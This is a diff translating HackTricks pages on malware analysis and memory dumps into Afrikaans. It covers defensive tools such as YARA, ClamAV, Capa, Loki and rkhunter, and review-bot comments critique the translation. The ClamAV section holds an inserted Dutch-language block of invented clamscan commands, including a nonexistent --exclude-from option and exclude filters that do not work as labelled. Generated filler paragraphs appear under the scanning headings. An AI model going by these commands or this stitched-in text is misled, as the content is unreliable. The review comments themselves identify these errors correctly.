* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
||||
**Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
**Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
|
|
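Review bot: The Trickest banner sentence in this footer drops the verb: "om maklik en **outomatiese werksvloeie** te bou" reads as "to build easy and automatic workflows", while the English line it replaces says "easily build and **automate workflows**". Suggest "om maklik werksvloeie te bou en te **outomatiseer**" so the bold phrase keeps its original sense. "Kry Vandag Toegang:" also copies the English title case; the other translated lines in this hunk use sentence case ("Ander maniere om HackTricks te ondersteun:"), so "Kry vandag toegang:" would be consistent.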
@ -1,24 +1,24 @@
|
|||
# Malware Analysis
|
||||
# Malware Analise
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Forensics CheatSheets
|
||||
## Forensiese Spiekbriefies
|
||||
|
||||
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
|
||||
|
||||
## Online Services
|
||||
## Aanlyn Dienste
|
||||
|
||||
* [VirusTotal](https://www.virustotal.com/gui/home/upload)
|
||||
* [HybridAnalysis](https://www.hybrid-analysis.com)
|
||||
|
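Review bot: The page title "# Malware Analise" is inconsistent with the link text this same commit uses for the page in memory-dump-analysis.md, "[**Malware-analise**](../malware-analysis.md)"; Afrikaans writes such compounds as one hyphenated word, so suggest "# Malware-analise" here. The two section headings "## Forensiese Spiekbriefies" and "## Aanlyn Dienste" keep English title case while the surrounding translated lines use sentence case; either convention is fine, but pick one for the whole file.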
@ -26,136 +26,249 @@ Other ways to support HackTricks:
|
|||
* [Intezer](https://analyze.intezer.com)
|
||||
* [Any.Run](https://any.run/)
|
||||
|
||||
## Offline Antivirus and Detection Tools
|
||||
## Aflyn Antivirus en Opvangs Gereedskap
|
||||
|
||||
### Yara
|
||||
|
||||
#### Install
|
||||
|
||||
#### Installeer
|
||||
```bash
|
||||
sudo apt-get install -y yara
|
||||
```
|
||||
#### Maak reëls gereed
|
||||
|
||||
#### Prepare rules
|
||||
|
||||
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
|
||||
|
||||
Gebruik hierdie skrip om al die yara malware reëls vanaf GitHub af te laai en saam te voeg: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
Skep die _**reëls**_ gids en voer dit uit. Dit sal 'n lêer genaamd _**malware\_rules.yar**_ skep wat al die yara reëls vir malware bevat.
|
||||
```bash
|
||||
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
|
||||
mkdir rules
|
||||
python malware_yara_rules.py
|
||||
```
|
||||
#### Skandering
|
||||
|
||||
#### Scan
|
||||
Om te begin met die analise van malware, is dit belangrik om 'n skandering uit te voer op die verdagte lêer. Hierdie skandering sal help om enige bekende malware te identifiseer en om te bepaal of die lêer 'n potensiële bedreiging is.
|
||||
|
||||
Daar is verskeie skanderingstegnieke wat gebruik kan word, soos die gebruik van 'n antivirusprogram, 'n sandboks, of 'n statiese analisehulpmiddel. Dit is belangrik om 'n betroubare en up-to-date skanderingstegniek te gebruik om die beste resultate te verseker.
|
||||
|
||||
Die skandering moet uitgevoer word op 'n geïsoleerde stelsel of in 'n virtuele omgewing om te voorkom dat die malware versprei of skade aanrig. Dit is ook belangrik om die skandering uit te voer met behulp van 'n gebruiker met beperkte regte om te voorkom dat die malware bevoorregte toegang verkry.
|
||||
|
||||
As die skandering 'n bekende malware identifiseer, moet die nodige stappe geneem word om die malware te verwyder en die impak daarvan te beperk. As die skandering egter nie enige bekende malware identifiseer nie, moet verdere analise uitgevoer word om die aard en funksionaliteit van die lêer te bepaal.
|
||||
```bash
|
||||
yara -w malware_rules.yar image #Scan 1 file
|
||||
yara -w malware_rules.yar folder #Scan the whole folder
|
||||
```
|
||||
#### YaraGen: Kontroleer vir malware en Skep reëls
|
||||
|
||||
#### YaraGen: Check for malware and Create rules
|
||||
|
||||
You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
|
||||
|
||||
Jy kan die instrument [**YaraGen**](https://github.com/Neo23x0/yarGen) gebruik om yara-reëls te genereer vanaf 'n binêre lêer. Kyk na hierdie tutoriale: [**Deel 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deel 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deel 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
|
||||
```bash
|
||||
python3 yarGen.py --update
|
||||
python3.exe yarGen.py --excludegood -m ../../mals/
|
||||
python3 yarGen.py --update
|
||||
python3.exe yarGen.py --excludegood -m ../../mals/
|
||||
```
|
||||
|
||||
### ClamAV
|
||||
|
||||
#### Install
|
||||
#### Installeer
|
||||
|
||||
```bash
|
||||
sudo apt-get install clamav
|
||||
```
|
||||
|
||||
#### Bijwerken van de virusdefinities
|
||||
|
||||
```bash
|
||||
sudo freshclam
|
||||
```
|
||||
|
||||
#### Scannen van een bestand
|
||||
|
||||
```bash
|
||||
clamscan <bestandsnaam>
|
||||
```
|
||||
|
||||
#### Scannen van een map
|
||||
|
||||
```bash
|
||||
clamscan -r <mapnaam>
|
||||
```
|
||||
|
||||
#### Scannen van het hele systeem
|
||||
|
||||
```bash
|
||||
clamscan -r /
|
||||
```
|
||||
|
||||
#### Rapport genereren van de scanresultaten
|
||||
|
||||
```bash
|
||||
clamscan -r --log=<rapportnaam>.log /
|
||||
```
|
||||
|
||||
#### Quarantaine van geïnfecteerde bestanden
|
||||
|
||||
```bash
|
||||
clamscan -r --move=<quarantainemap> /
|
||||
```
|
||||
|
||||
#### Verwijderen van geïnfecteerde bestanden
|
||||
|
||||
```bash
|
||||
clamscan -r --remove /
|
||||
```
|
||||
|
||||
#### Uitsluiten van bestanden of mappen van de scan
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude=<bestand/mappad> /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandsextensies van de scan
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude=".extensie" /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandstypen van de scan
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude="type/bestand" /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandsgroottes van de scan
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude=">grootte" /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandskenmerken van de scan
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude="kenmerk" /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van reguliere expressies
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude="regex:patroon" /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestanden of mappen van de scan met behulp van een lijst
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude-from=<lijstbestand> /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandsextensies van de scan met behulp van een lijst
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude=".extensie" --exclude-from=<lijstbestand> /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandstypen van de scan met behulp van een lijst
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude="type/bestand" --exclude-from=<lijstbestand> /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van een lijst
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude="kenmerk" --exclude-from=<lijstbestand> /
|
||||
```
|
||||
|
||||
#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van reguliere expressies in een lijst
|
||||
|
||||
```bash
|
||||
clamscan -r --exclude="regex:patroon" --exclude-from=<lijstbestand> /
|
||||
```
|
||||
```
|
||||
sudo apt-get install -y clamav
|
||||
```
|
||||
#### Skandering
|
||||
|
||||
#### Scan
|
||||
Om 'n malware-analise te begin, is dit belangrik om die betrokke stelsel te skandeer vir enige moontlike malware. Hier is 'n paar skanderingstegnieke wat gebruik kan word:
|
||||
|
||||
- **Antivirus-skandering**: Voer 'n volledige skandering uit met 'n betroubare antivirusprogram om enige bekende malware te identifiseer.
|
||||
- **Rootkit-skandering**: Gebruik 'n spesialiteitstool om te soek na enige versteekte rootkits wat moontlik op die stelsel geïnstalleer kan wees.
|
||||
- **Netwerkverkeersanalise**: Monitor die netwerkverkeer om enige verdagte aktiwiteit of ongewone patrone te identifiseer.
|
||||
- **Bestandshashing**: Skep 'n hashtabel van alle lêers op die stelsel en vergelyk dit met 'n databasis van bekende skadelike lêers.
|
||||
- **Geheue-analise**: Analiseer die stelsel se geheue vir enige verdagte prosesse of aktiwiteit.
|
||||
|
||||
Dit is belangrik om 'n kombinasie van hierdie skanderingstegnieke te gebruik om 'n volledige prentjie van die stelsel se veiligheid te verkry.
|
||||
```bash
|
||||
sudo freshclam #Update rules
|
||||
clamscan filepath #Scan 1 file
|
||||
clamscan folderpath #Scan the whole folder
|
||||
```
|
||||
|
||||
### [Capa](https://github.com/mandiant/capa)
|
||||
|
||||
**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as:
|
||||
**Capa** ontdek potensieel skadelike **vermoëns** in uitvoerbare lêers: PE, ELF, .NET. Dit sal dinge soos Att\&ck-taktieke of verdagte vermoëns soos die volgende vind:
|
||||
|
||||
* check for OutputDebugString error
|
||||
* run as a service
|
||||
* create process
|
||||
* kontroleer vir OutputDebugString-fout
|
||||
* hardloop as 'n diens
|
||||
* skep proses
|
||||
|
||||
Get it int he [**Github repo**](https://github.com/mandiant/capa).
|
||||
Kry dit in die [**Github-opberging**](https://github.com/mandiant/capa).
|
||||
|
||||
### IOCs
|
||||
|
||||
IOC means Indicator Of Compromise. An IOC is a set of **conditions that identify** some potentially unwanted software or confirmed **malware**. Blue Teams use this kind of definition to **search for this kind of malicious files** in their **systems** and **networks**.\
|
||||
To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
|
||||
IOC beteken Indicator Of Compromise. 'n IOC is 'n stel **voorwaardes wat** enige potensieel ongewenste sagteware of bevestigde **malware identifiseer**. Blou-spanne gebruik hierdie tipe definisie om hierdie soort skadelike lêers in hul stelsels en netwerke te **soek**.\
|
||||
Dit is baie nuttig om hierdie definisies te deel, want as malware in 'n rekenaar geïdentifiseer word en 'n IOC vir daardie malware geskep word, kan ander Blou-spanne dit gebruik om die malware vinniger te identifiseer.
|
||||
|
||||
A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
|
||||
You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**.
|
||||
'n Hulpmiddel om IOCs te skep of te wysig is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
|
||||
Jy kan gereedskap soos [**Redline**](https://www.fireeye.com/services/freeware/redline.html) gebruik om gedefinieerde IOCs in 'n toestel te **soek**.
|
||||
|
||||
### Loki
|
||||
|
||||
[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
|
||||
Detection is based on four detection methods:
|
||||
|
||||
[**Loki**](https://github.com/Neo23x0/Loki) is 'n skandeerder vir Eenvoudige Indicators of Compromise.\
|
||||
Deteksie is gebaseer op vier deteksie-metodes:
|
||||
```
|
||||
1. File Name IOC
|
||||
Regex match on full file path/name
|
||||
Regex match on full file path/name
|
||||
|
||||
2. Yara Rule Check
|
||||
Yara signature matches on file data and process memory
|
||||
Yara signature matches on file data and process memory
|
||||
|
||||
3. Hash Check
|
||||
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
|
||||
|
||||
4. C2 Back Connect Check
|
||||
Compares process connection endpoints with C2 IOCs (new since version v.10)
|
||||
```
|
||||
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
|
||||
|
||||
4. C2 Back Connect Check
|
||||
Compares process connection endpoints with C2 IOCs (new since version v.10)
|
||||
```
|
||||
### Linux Malware Detect
|
||||
|
||||
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources.
|
||||
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is 'n kwaadwillige skanderingstool vir Linux wat vrygestel is onder die GNU GPLv2-lisensie en ontwerp is vir die bedreigings wat in gedeelde gehoste omgewings voorkom. Dit maak gebruik van bedreigingsdata van netwerkrandindringingsdeteksiesisteme om aktief gebruikte kwaadware in aanvalle te onttrek en handtekeninge vir opsporing te genereer. Daarbenewens word bedreigingsdata ook afgelei van gebruikersinskrywings met die LMD-uitklooi-funksie en kwaadware-gemeenskapsbronne.
|
||||
|
||||
### rkhunter
|
||||
|
||||
Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware.
|
||||
|
||||
Hulpmiddels soos [**rkhunter**](http://rkhunter.sourceforge.net) kan gebruik word om die lêersisteem vir moontlike **rootkits** en kwaadware te ondersoek.
|
||||
```bash
|
||||
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
|
||||
```
|
||||
|
||||
### FLOSS
|
||||
|
||||
[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques.
|
||||
[**FLOSS**](https://github.com/mandiant/flare-floss) is 'n instrument wat sal probeer om versluierde strings binne uitvoerbare lêers te vind deur gebruik te maak van verskillende tegnieke.
|
||||
|
||||
### PEpper
|
||||
|
||||
[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).
|
||||
[PEpper](https://github.com/Th3Hurrican3/PEpper) kontroleer sekere basiese dinge binne die uitvoerbare lêer (binêre data, entropie, URL's en IP-adresse, sekere yara-reëls).
|
||||
|
||||
### PEstudio
|
||||
|
||||
[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques.
|
||||
[PEstudio](https://www.winitor.com/download) is 'n instrument wat inligting oor Windows-uitvoerbare lêers kan verkry, soos invoer, uitvoer, koppe, maar dit sal ook virus totaal kontroleer en potensiële Att\&ck-tegnieke vind.
|
||||
|
||||
### Detect It Easy(DiE)
|
||||
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**.
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is 'n instrument om te bepaal of 'n lêer **versleutel** is en ook om **pakkers** te vind.
|
||||
|
||||
### NeoPI
|
||||
|
||||
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
|
||||
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) is 'n Python-skripsie wat verskeie **statistiese metodes** gebruik om **versluierde** en **versleutelde** inhoud binne teks-/skripslêers op te spoor. Die beoogde doel van NeoPI is om te help met die opsporing van verborge webshell-kode.
|
||||
|
||||
### **php-malware-finder**
|
||||
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells.
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) doen sy uiterste bes om **versluierde**/**dodgy kode** asook lêers wat PHP-funksies gebruik wat dikwels in **malware**/webshells gebruik word, op te spoor.
|
||||
|
||||
### Apple Binary Signatures
|
||||
|
||||
When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
|
||||
### Apple Binêre Handtekeninge
|
||||
|
||||
Wanneer jy 'n **malware monster** ondersoek, moet jy altyd die handtekening van die binêre lêer **ondersoek**, aangesien die **ontwikkelaar** wat dit onderteken het, moontlik al verband hou met **malware**.
|
||||
```bash
|
||||
#Get signer
|
||||
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
|
||||
|
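Review bot: The ClamAV section gained a large block that is not a translation of anything in the source hunk and is written in Dutch rather than Afrikaans ("Bijwerken van de virusdefinities", "Scannen van een bestand", "Uitsluiten van specifieke bestandsextensies", placeholders like `<bestandsnaam>`, `<mapnaam>`, `<lijstbestand>`); it should be dropped. Beyond the language, the commands it introduces are not real clamscan usage: clamscan has no `--exclude-from` option, and `--exclude` takes a regular expression matched against file paths, so `--exclude=">grootte"`, `--exclude="type/bestand"` and `--exclude="kenmerk"` do not filter by size, type or attribute as their headings claim. The original content of this section is only the install line and the three-line scan block (`sudo freshclam #Update rules`, `clamscan filepath #Scan 1 file`, `clamscan folderpath #Scan the whole folder`), which are still present further down, and the install command now appears twice (`sudo apt-get install clamav` and `sudo apt-get install -y clamav`). The same applies to the two "#### Skandering" paragraphs under Yara and ClamAV ("Om te begin met die analise van malware...", "Om 'n malware-analise te begin..." with the bullet list "Antivirus-skandering", "Rootkit-skandering", "Netwerkverkeersanalise", "Bestandshashing", "Geheue-analise"): the English source has only the "#### Scan" heading followed by the code block, so these paragraphs are generated filler and should be removed. Smaller translation points in this hunk: "Skep die _**reëls**_ gids" translates the literal directory name that `mkdir rules` creates in the code block below it, so keep it as `rules`; "Opvangs Gereedskap" in "## Aflyn Antivirus en Opvangs Gereedskap" means interception rather than detection ("Opsporingsgereedskap"); "kwaadwillige skanderingstool" describes LMD as a malicious tool instead of a malware scanner ("kwaadware-skandeerder"), and "LMD-uitklooi-funksie" is not a rendering of "LMD checkout feature"; "Python-skripsie" means a thesis ("Python-skrip"); and "virus totaal" in the PEstudio line is the product name VirusTotal and should stay as such.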
@ -166,31 +279,30 @@ codesign --verify --verbose /Applications/Safari.app
|
|||
#Check if the signature is valid
|
||||
spctl --assess --verbose /Applications/Safari.app
|
||||
```
|
||||
## Opsoektegnieke
|
||||
|
||||
## Detection Techniques
|
||||
### Lêerstapel
|
||||
|
||||
### File Stacking
|
||||
As jy weet dat 'n sekere **gids wat die lêers van 'n webbediener bevat, laas op 'n sekere datum opgedateer is**, **kontroleer** die **datum** waarop al die **lêers** in die webbediener geskep en gewysig is, en as enige datum **verdag voorkom**, kontroleer daardie lêer.
|
||||
|
||||
If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file.
|
||||
### Basiese lyn
|
||||
|
||||
### Baselines
|
||||
As die lêers van 'n gids **nie gewysig behoort te wees nie**, kan jy die **hak** van die **oorspronklike lêers** van die gids bereken en dit **vergelyk** met die **huidige** lêers. Enige iets wat gewysig is, sal **verdag voorkom**.
|
||||
|
||||
If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**.
|
||||
### Statistiese analise
|
||||
|
||||
### Statistical Analysis
|
||||
|
||||
When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**.
|
||||
Wanneer die inligting in loglêers gestoor word, kan jy **statistieke soos hoeveel keer elke lêer van 'n webbediener as 'n webshell benader is**, nagaan.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
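Review bot: "die **hak** van die **oorspronklike lêers**" under "### Basiese lyn" turns "hash" into "hak" (to chop or hack); technical Afrikaans keeps "hash", so suggest "die **hash** van die oorspronklike lêers". The last sentence of the hunk also loses the reasoning of the English: "statistieke soos hoeveel keer elke lêer van 'n webbediener as 'n webshell benader is" says "how many times each file was accessed as a web shell", whereas the source says to check how many times each file was accessed because a web shell is likely to be among the most accessed; suggest "... hoeveel keer elke lêer van 'n webbediener benader is, aangesien 'n webshell waarskynlik een van die mees benaderde sal wees". Heading choices: "Opsoektegnieke" means lookup techniques ("Opsporingstegnieke" for Detection Techniques), and "Basiese lyn" is a word-for-word rendering of "Baselines" ("Basislyne"). The footer in this hunk says "HackTricks-uitrusting" and "haktruuks" where the header of the same file in the earlier hunk uses "HackTricks swag" and "hacktruuks"; align the two.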
@ -1,53 +1,53 @@
|
|||
# Memory dump analysis
|
||||
# Geheue dump-analise
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
